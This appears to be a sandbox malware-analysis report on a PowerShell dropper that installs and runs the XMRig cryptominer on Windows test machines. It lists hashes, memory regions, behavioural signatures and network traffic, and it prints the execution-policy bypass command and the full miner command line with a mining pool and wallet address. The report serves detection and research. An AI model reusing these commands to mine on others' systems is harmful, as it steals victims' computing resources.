C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cqsc4gvw.ng3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4700-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4700-48-0x000001F2F21B0000-0x000001F2F21C2000-memory.dmp
memory/4700-61-0x000001F2F21A0000-0x000001F2F21AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/624-90-0x000001F8D92D0000-0x000001F8D92F0000-memory.dmp
memory/624-91-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/4700-93-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4700-94-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/624-92-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/4700-95-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/624-96-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-97-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-98-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-99-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-100-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-101-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-102-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-103-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-104-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-105-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-106-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-107-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-108-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-109-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-110-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-111-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-112-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-113-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-114-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-115-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-116-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-117-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-118-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-119-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-120-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-121-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-122-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-123-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-124-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-125-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-126-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-127-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-128-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-129-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-130-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-131-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-132-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-133-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-134-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-135-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-136-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-137-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-138-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-139-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-140-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-141-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-142-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-143-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-144-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-145-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-146-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-147-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-148-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-149-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-150-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-151-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-152-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-153-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-154-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-155-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
memory/624-156-0x00007FF6A5450000-0x00007FF6A6083000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4120 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4120 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4120-0-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wjtyd1uk.d0n.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4120-9-0x00000232DC540000-0x00000232DC562000-memory.dmp
memory/4120-10-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/4120-11-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/4120-12-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/4120-14-0x00000232DC5D0000-0x00000232DC5E2000-memory.dmp
memory/4120-15-0x00000232DC5C0000-0x00000232DC5CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2872-46-0x000001B1C42C0000-0x000001B1C42E0000-memory.dmp
memory/2872-47-0x000001B1C4310000-0x000001B1C4330000-memory.dmp
memory/2872-48-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/4120-50-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/2872-49-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/4120-51-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp
memory/2872-54-0x000001B1C4350000-0x000001B1C4370000-memory.dmp
memory/2872-53-0x000001B1C4330000-0x000001B1C4350000-memory.dmp
memory/4120-52-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp
memory/2872-55-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-56-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-58-0x000001B1C4350000-0x000001B1C4370000-memory.dmp
memory/2872-57-0x000001B1C4330000-0x000001B1C4350000-memory.dmp
memory/2872-59-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-60-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-61-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-62-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-63-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-64-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-65-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-66-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-67-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-68-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-69-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-70-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-71-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-72-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-73-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-74-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-75-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-76-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-77-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-78-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-79-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-80-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-81-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-82-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-83-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-84-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-85-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-86-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-87-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-88-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-89-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-90-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-91-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-92-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-93-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-94-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-95-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-96-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-97-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-98-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-99-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-100-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-101-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-102-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-103-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-104-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-105-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-106-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-107-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-108-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-109-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-110-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-111-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-112-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-113-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-114-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-115-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-116-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
memory/2872-117-0x00007FF6A84E0000-0x00007FF6A9113000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:47
Platform
win10-20240404-en
Max time kernel
1794s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2812 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2812 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/2812-0-0x00007FFCBB3D3000-0x00007FFCBB3D4000-memory.dmp
memory/2812-5-0x0000019F545D0000-0x0000019F545F2000-memory.dmp
memory/2812-8-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/2812-9-0x0000019F54780000-0x0000019F547F6000-memory.dmp
memory/2812-10-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4vlchze.fkx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2812-25-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/2812-48-0x0000019F54920000-0x0000019F54932000-memory.dmp
memory/2812-61-0x0000019F54760000-0x0000019F5476A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5072-90-0x000001EABAE80000-0x000001EABAEA0000-memory.dmp
memory/2812-91-0x00007FFCBB3D3000-0x00007FFCBB3D4000-memory.dmp
memory/2812-92-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/5072-93-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/2812-94-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/5072-95-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-96-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-97-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-98-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-99-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-100-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-101-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-102-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-103-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-104-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-105-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-106-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-107-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-108-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-109-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-110-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-111-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-112-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-113-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-114-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-115-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-116-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-117-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-118-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-119-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-120-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-121-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-122-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-123-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-124-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
